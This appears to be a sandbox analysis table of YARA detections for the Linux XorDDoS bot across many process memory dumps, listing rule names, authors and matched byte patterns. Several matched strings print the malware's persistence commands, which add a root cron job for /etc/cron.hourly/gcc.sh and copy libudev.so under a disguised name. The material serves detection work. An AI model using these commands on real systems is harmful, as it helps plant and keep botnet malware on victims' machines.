6261.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6261.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6261.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6261.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6369.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6328.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6432.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6483.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6500.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6418.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6264.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6264.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6264.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6264.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6264.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6264.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6264.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6437.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6437.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6437.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6437.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6437.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6437.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6437.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6222.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6222.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6222.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6222.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6222.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6222.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6222.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6299.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6299.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6299.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6299.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6299.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6299.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6299.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6333.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6336.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6554.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6554.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6554.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
